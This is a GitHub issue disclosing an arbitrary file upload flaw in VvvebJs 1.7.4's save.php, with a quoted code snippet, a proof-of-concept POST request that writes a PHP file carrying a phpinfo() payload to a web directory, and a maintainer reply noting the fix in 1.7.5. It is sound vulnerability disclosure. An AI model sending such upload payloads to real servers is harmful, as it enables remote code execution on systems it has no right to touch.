Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

VvvebJs 1.7.4 has an arbitrary file upload vulnerability #343

Open
Hebing123 opened this issue Mar 11, 2024 · 2 comments
Open

VvvebJs 1.7.4 has an arbitrary file upload vulnerability #343

Hebing123 opened this issue Mar 11, 2024 · 2 comments

Comments

@Hebing123
Copy link

Hebing123 commented Mar 11, 2024
edited

###Summary
VvvebJs version 1.7.4 exhibits an arbitrary file upload vulnerability. An attacker can exploit this vulnerability to upload malicious files onto the server, potentially leading to the execution of arbitrary code under the context of the webserver.

Details

The vulnerability arises from the 'save.php' file as it fails to implement adequate checks on the types of files being uploaded. The 'sanitizeFileName' function is designed to remove any unsecured characters and parameters from the filename and restrict the file extension to '.html'. However, the function fails to validate the user input properly, allowing an attacker to bypass these checks.
Here is the relevant code snippet:

VvvebJs/save.php

Lines 87 to 89 in c6422cf

if (isset($_POST['file'])) {
$file = sanitizeFileName($_POST['file']);
}

In the code, $_POST['file'] takes user input without proper filtering or verification. The filename provided by user input is assigned to the $file variable, which ultimately gets uploaded to the server without going through sufficient security measures.

Proof of Concept (POC)

POST /save.php HTTP/1.1
Host: 192.168.160.147
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>

After uploading the attacker accesses the URL:http://192.168.160.147/demo/landing/index.php
image

Impact

Given that this is an arbitrary file upload vulnerability, an attacker can potentially upload any type of files, including malicious PHP scripts or web shells. After successful exploitation, an attacker may leverage the ability to execute arbitrary code in the context of the webserver, enabling them to carry out further attacks, potentially gaining unauthorized access to sensitive data or escalating their privileges on the server.
It is highly recommended that developers patch this vulnerability promptly.
@givanz
Copy link
Owner

givanz commented Mar 11, 2024

Thanks for the vulnerability report, it was previously reported #339 and fixed in c6422cf it is now also included in the last release https://github.com/givanz/VvvebJs/releases/tag/1.7.5

@Hebing123
Copy link
Author

I'm glad this issue will be fixed in 1.7.5, thanks to VvvebJs team for maintaining the project!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@givanz @Hebing123